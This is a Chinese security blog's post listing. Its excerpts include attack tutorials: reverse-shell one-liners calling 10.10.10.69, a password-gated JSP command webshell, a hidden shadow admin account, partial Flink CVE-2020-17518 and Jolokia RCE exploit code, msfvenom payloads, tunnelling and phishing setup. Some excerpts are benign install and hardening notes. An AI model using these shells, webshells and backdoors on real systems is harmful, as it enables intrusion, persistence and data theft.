自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(84)
  • 收藏
  • 关注

原创 隐私合规检测工具_camille使用

电脑端安装python3、frida,准备一台root过的安卓机。

2023-11-17 11:49:40 178 1

原创 burp+fiddler联动抓包

手机流量——fiddler——burp解决问题:burp对app或小程序测试响应速度较慢,效率较低,而且经常抓不到包。

2023-11-02 23:19:37 312

原创 EwoMail结合gophish的钓鱼邮件指南

Email Headers 是自定义邮件头字段,例如邮件头的X-Mailer字段,若不修改此字段的值,通过gophish发出的邮件,其邮件头的X-Mailer的值默认为gophish。

2023-10-12 17:33:21 597

原创 代理工具之iox

项目地址https://github.com/EddieIvan01/iox使用方法建立socks5代理1、肉机开启socks5./iox proxy -l 10802、vps开启监听./iox proxy -l 9999 -l 10803、肉机执行转发./iox proxy -r 1.1.1.1:99994、socks5代理地址为1.1.1.1:1080...

2021-09-22 21:04:03 8934

原创 windows之schtasks设置计划任务

常用操作/Create 创建计划任务/Delete 删除计划任务/Query 显示计划任务/Change 更改计划任务属性/Run 按需运行计划任务/End 中止正在运行的计划任务/ShowSid 显示与计划任务名称相应的安全标识符/? 显示帮助消息常用参数/sc 计划类型:minute、 hourly、daily、weekly、mont

2021-04-16 18:33:19 718

原创 windows常用命令

常用命令regedit 打开注册表route print 查看路由表信息arp -a 查看arp缓存信息ipconfig 查看本地连接ipconfig /all IP详细设置netstat -s -p icmp 查看路由器和主机连接 /ICMP连接情况set 查看环境变量winver windows版本账号相关whoami 当前用户:电脑名/用户名或域名/用户名 query user 查询所有登录用户/运

2021-04-14 21:07:16 245

原创 windows创建影子账户

1、创建隐藏账户并加入管理员组net user test$ 123456 /addnet localgroup administrators test$ /add2、运行regedit打开注册表对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限3、重新打开注册表,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names查看administrator对应

2021-04-14 21:04:10 3266 2

原创 一句话收录

JSP马带密码的回显cmd马<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<p

2021-01-16 14:45:42 442

原创 利用CVE-2020-17518一键Getshell

漏洞描述Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置漏洞利用import requestsimport jsonimport base64#获取tmpdir的路径url = "http://ip:port"tmpdir_url = url + '/jobmanager/config'tmpdir_res = requests.get(tmpdir_url)tmpdir = json.loads(

2021-01-13 15:10:25 574

原创 sql注入知识点汇总

类型union联合查询注入布尔盲注报错注入时间盲注堆叠查询注入二次注入宽字节注入base64注入cookie注入攻击-http请求头参数注入常用函数substr(),mid(),limit(),rand(),floor(),concat(),ascii()常用报错函数1、floor()函数union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group

2020-12-28 11:43:06 173

原创 解析漏洞总结

IIS解析漏洞IIS6.01、目录解析漏洞:*.asp目录下的所有文件都会当做asp脚本执行,比如test.asp/1.jpg,1.jpg被当做asp文件执行2、;截断,比如test.asp;1.jpg,文件被截断,被解析为test.aspIIS7.0和IIS7.5畸形解析漏洞(php配置问题)默认fast-cgi开启状况下,在一个文件路径后面加上/xx.php会将原来的文件解析为php文件比如构造a.jpg/a.php ,会将图片当做php脚本执行,攻击者可以通过上传一句话图片木马获取webs

2020-12-25 13:58:50 350

原创 利用MySQL账号getshell

前提已经获得了mysql数据库的账号密码,可结合sqlmap来获取系统权限执行sqlmap -d "mysql://root:密码@IP:3306/test" -f 打印数据库信息其中test为数据库名,一般默认安装都有更换参数获取系统权限sqlmap -d "mysql://root:密码@IP:3306/test" --os-shell参考文章https://bbs.ichunqiu.com/thread-18254-1-5.html...

2020-12-08 17:12:24 523 1

原创 Metasploit的使用

常用命令msfconsole 进入msf终端search xxx 搜索相关漏洞use xxx 使用漏洞模块info 显示某模块的详细信息show options 显示某模块的详细信息show targets 查看该模块适用的攻击目标类型show exploits 查看可用漏洞 show auxiliary 查看可用辅助攻击工具 show payloads 查看攻击载荷sessions -l 查看会话msfvenom生成攻击载荷生成可执行

2020-12-04 17:02:58 297

原创 信息泄露漏洞记录

svn源代码泄露漏洞成因:SVN是源代码版本管理软件,开发人员在服务器上布署代码时,如果使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此漏洞检测工具:https://github.com/admintony/svnExploit漏洞危害:攻击者可以下载网站源代码,从wc.db获取敏感信息漏洞修复:删除/.svn 文件夹禁止访问 /.svn 目录git信息泄露漏洞成因:开发人员使用git进行版本控制,对站点自动部署。如果将.git文件夹直接部署到线上环

2020-12-03 11:48:41 411

原创 Jolokia RCE漏洞利用

利用步骤1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.javapublic class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp

2020-11-30 15:13:58 3003 1

原创 MSF路由转发

前言已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由msf访问内网实现的条件:1.获得一个msf的session会话2.在msf中添加内网网段的路由步骤1.msf反弹shell,获取session会话,具体过程可以参考:https://blog.csdn.net/baidu_38844729/article/details/109940441,我已经获得了会话,2.添加路由route add 0.0.0.0 0.0.0.0 session ID #分别为

2020-11-29 17:06:09 907

原创 SSH隧道代理转发

参数-C:允许压缩数据-f :后台运行,并推荐加上 -n 参数-N:不执行远程命令-g:允许远端主机连接本地转发的端口-L:本地端口转发-R:远程端口转发-D:动态转发-P:指定ssh端口环境:攻击机:10.10.10.55web服务器:10.10.10.44(内网IP为192.168.52.44)域控:192.168.52.99本地转发外部攻击机(kali)10.10.10.55可以访问web服务器10.10.10.44(内网IP为192.168.52.44),但是访问不了域

2020-11-25 09:43:32 391

原创 Mysql中使用UDF提权

提权步骤1.查看secure_file_priv的值 show global variables like 'secure%'; 当secure_file_priv的值为 NULL或/tmp/时,此时无法提权 当secure_file_priv的值没有具体值时,则可以提权2.查看系统架构以及某些目录show variables like '%compile%'; 查看主机版本及架构show variables like 'plugin%'; 查看pl

2020-11-23 11:12:27 1199

原创 CobaltStrike使用之如何上线

前言已经拿到某台肉鸡的web权限,想进行后渗透攻击,进入内网收集信息,我们可以用到cobaltstrikemsf反弹shell1、制作反弹shell-exe文件在这里插入代码片msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.10.159 lport=4444 -f exe -o abc.exelhost:攻击机IPlport:监听端口2、msf运行命令msfconslemsf5 > use exploit/mu

2020-11-22 14:26:46 1402

原创 反弹shell的各种姿势

前言:攻击机器IP10.10.10.69,监听端口888,反弹命令均在目标机器上执行nc -lvp 8881、bash反弹bash -i >& /dev/tcp/10.10.10.69/888 0>&1base64编码绕过:http://www.jackson-t.ca/runtime-exec-payloads.html2、nc反弹nc -e /bin/bash 10.10.10.69 8883、awk反弹awk 'BEGIN{s="/inet/tcp/0

2020-11-12 14:02:50 536

原创 内网信息收集

常用信息收集查看网络配置信息:ipconfig /all查看系统详细信息:systeminfo查看系统体系架构:echo %PROCESSOR_ARCHITECTURE%安装的软件及版本路径:wmic product get name,version本机服务:wmic service list brief进程列表:tasklist进程信息:wmic process list brief启动程序信息:wmic startup get command,caption计划任务:schtasks

2020-11-10 17:45:42 164

原创 postgresql的安装和配置

安装apt updateapt install postgresql postgresql-contrib常用命令service postgresql status 查看状态service postgresql restart 重启service postgresql start 开启service postgresql stop 关闭运行状态下进入pgsql控制端su postgres 切换为postgres账号psql 进入数据库终端配置postgresql数据库安

2020-10-30 15:38:28 594

原创 浏览器解码规则详解

解码规则浏览器解码遵循这样一个规则:html解析器对html文档进行解析,完成html解码并且创建DOM树JavaScript 或者CSS解析器对内联脚本进行解析,完成JS、CSS解码url解码会根据url所在的顺序不同而在JS解码前或者解码后解码顺序html解析第一步执行,而JS解析和url解析则要根据情况而定html解析器1、html解析器以状态机的方式运行,举例:<p>Hello</p>状态流程为:Data—>Tag open—>Tag nam

2020-10-28 15:10:22 1578 1

原创 主动扫描和被动扫描的区别

web漏洞扫描器web漏扫的工作大致可以分为三个阶段:页面爬取——探测点发现——漏洞检测主要有主动扫描器和被动扫描器两种主动扫描: 输入某个URL,然后由扫描器中的爬虫模块爬取所有链接,对GET、POST等请求进行参数变形和污染,进行重放测试,然后依据返回信息中的状态码、数据大小、数据内容关键字等去判断该请求是否含有相应的漏洞被动扫描: 在进行手动测试的过程中,代理将流量转发给漏洞扫描器,然后再进行漏洞检测区别: 被动扫描不进行大规模的爬虫爬取行为,不主动爬取站点链接,而是通过流量、代理等方式去采

2020-10-14 15:38:37 8747

原创 Docker Registry 安装及安全加固

默认安装拉取镜像运行docker run -d -p 5000:5000 --name registry registry:2使用举例docker pull busybox 拉取镜像docker tag busybox localhost:5000/bosybox:v1.0 打标签docker push localhost:5000/bosybox:v1.0 推送给registrydocker pull localhost:5000/bosybox:v1.0 通过自建的registr

2020-09-27 16:18:36 599

原创 ldap修改管理员密码

1、查看openldap管理员密码字段ldapsearch -H ldapi:// -LLL -Q -Y EXTERNAL -b "cn=config" "(olcRootDN=*)" dn olcRootDN olcRootPW从图中可以看到ldap管理员密码的加密字段:{SSHA}IvUoVHyR5K1zeyRFABKwIfDzF91dGNDd2、设置openldap管理员新密码slappasswd -s test1234563、生成修改openlap管理员密码的ldif文件cat

2020-08-28 17:09:17 6095

原创 常用服务汇总

Apache Flink是开源流处理框架,可用于对流数据进行分布式处理,在大数据领域中应用广泛Apache Shiro是一个强大且易用的Java安全框架,可以执行身份验证、授权、密码和会话管理Axis即Apache可扩展交互系统,是一个SOAP引擎,提供创建服务端、客户端和网关SOAP操作的框架Confluence是一个wiki程序,一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享CouchDB是一个开源的面向文档的数据库管理系统Druid是Java语言中的数据库连接池Drupa.

2020-08-27 17:13:25 3233

原创 NFS服务安装和配置

环境安装系统环境:ubuntu 16.04安装命令apt install nfs-kernel-server #安装服务端apt install nfs-common #安装客户端服务配置服务端修改配置文件/etc/exports/home 10.10.10.0/24(rw,sync,no_root_squash)表示共享目录为/home,可访问网段为10.10.10.0/24注意:可访问的IP不可设置为*,会导致匿名访问启动服务service rpcbind start

2020-08-12 17:50:53 250

原创 apache禁止目录浏览或设置密码访问

禁止目录浏览修改apache配置文件apache2.conf或是httpd.conf其中Indexes改为-Indexes,表示禁止浏览然后重启apache服务:service apache2 restart设置密码访问1、使用htpasswd生成访问账号和密码存放于/var/www/html/members.txt中htpasswd -bc /var/www/html/members.txt test 123456 生成登录账号test,密码为1234562、修改apache配置文件ap

2020-07-24 16:47:29 990

原创 ldap禁止匿名访问

安装配置Linux:https://www.cnblogs.com/lemon-le/p/6266921.htmlWindows: https://www.cnblogs.com/myf008/p/7373144.htmlDocker: https://www.jianshu.com/p/13c62f54cc60Ldapadmin: https://www.ldapadministrator.com/download.htm禁止匿名访问ldap默认是允许用户匿名访问的,但只能进行read及sea

2020-07-08 14:04:08 5490

原创 Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)

漏洞分析漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码影响版本:Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3Spring Boot version < 2.0.0M4Spring Data release trains < Kay-RC3漏洞复现1、启动环境cd v

2020-07-06 09:52:05 2924

原创 Jenkins-CI远程代码执行漏洞复现(CVE-2017-1000353)

漏洞分析漏洞描述:Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。影响版本:Jenkins <= 2.56Jenkins LTS <= 2.46.1漏洞复现使用vulhub复现一、启动jenkins 2

2020-06-19 11:25:18 1159

原创 nmap使用方法

常用参数-p 指定端口 -O 操作系统信息探测 -A 操作系统指纹和版本探测 -V 详细输出扫描情况-sV 服务版本探测-sP Ping扫描--traceroute 路由追踪-iL ip.txt 批量扫描ip.txt中的目标

2020-06-02 13:49:25 298

原创 Sqlmap的常用命令

常用参数--is-dba 判断当前用户是否有管理员权限--users 查看所有用户--current-user 查看当前用户--dbs 查看所有数据库--current-db 查看当前数据库-D test --tables 查看test数据库中的所有表-D test -T users --columns 查看test数据库中user表的所有列-D test -T users -C username --dump 查看test数据库中user表中username列

2020-06-01 16:13:05 490

原创 常用信息收集

域名信息收集查找域名对应的IP:nslooup+域名;dig+域名whois信息:查找域名注册信息,比如域名所有人、域名注册商登使用站长之家查询:https://whois.aizhan.com/子域名查询:OneForAll,Sublist3r备案信息查询:天眼查,ICP备案查询网网站指纹识别kali中的网站指纹识别工具:whatweb在线指纹识别网站BugScaner:http://whatweb.bugscaner.com/look/WhatWeb:https://

2020-05-29 13:50:38 399

原创 Linux中安装配置Jboss

下载https://jbossas.jboss.org/downloads/安装tar xzvf jboss-as-7.1.1.Final.tar.gz 解压mv jboss-as-7.1.1.Final jboss 另存为mv jboss /usr/local 移动到/usr/local配置Jboss环境变量vim /etc/profile #末尾添加export JBOSS_HOME=/usr/local/jbossexport CLASSPATH=.:$CLASSPA

2020-05-26 15:25:00 556

原创 Redis未授权访问漏洞复现

漏洞分析漏洞产生:redis绑定在 0.0.0.0:6379,直接暴露在公网默认为空密码,可以免密码远程登录redis服务漏洞危害:攻击者无需认证访问到内部数据,导致敏感信息泄露攻击者通过数据备份功能往磁盘写入后门文件如果redis以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器漏洞复现环境:ubuntu系统两台,分别做为服务端和客户端redis安装:wget http://download.redis.io/releases/red

2020-05-21 10:55:49 445

原创 Linux中部署axis1.4服务

1、axis-bin-1_4.tar.gz 下载:http://archive.apache.org/dist/ws/axis/1_4/2、解压tar xzvf axis-bin-1_4.tar.gz3、解压后的目录名为axis-1_4复制axis-1_4/webapps/中的axis文件到Tomcat的webapps目录下4、浏览器访问http://localhost:8080/axis/...

2020-05-20 16:42:12 364

原创 Linux中安装qemu-kvm虚拟机

环境系统:redhat6.3在虚拟机安装时,需要启用CPU的虚拟化功能(关机状态下方能勾选)安装安装kvmyum install qemu-img qemu-kvm qemu-kvm-tools virt-manager virt-viewer virt-v2v virt-top libvirt libvirt-python libvirt-client python-virtinst bridge-utils tunctl问题解决1、启动virt-manger报错:unsupported

2020-05-19 16:24:40 3075 1

原创 docker搭建oracle数据库

环境搭建拉取镜像docker pull jaspeen/oracle-11g创建目录mkdir -p /server/oracle 安装目录mkdir -p /server/dpdump 数据目录下载oracle解压后放置于/server/oracle中启动dockerdocker run -d --privileged -p 1521:1521 -v /server/oracle:/install -v /server/dpdump:/opt/oracle/dpdump --n

2020-05-15 11:29:13 360

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除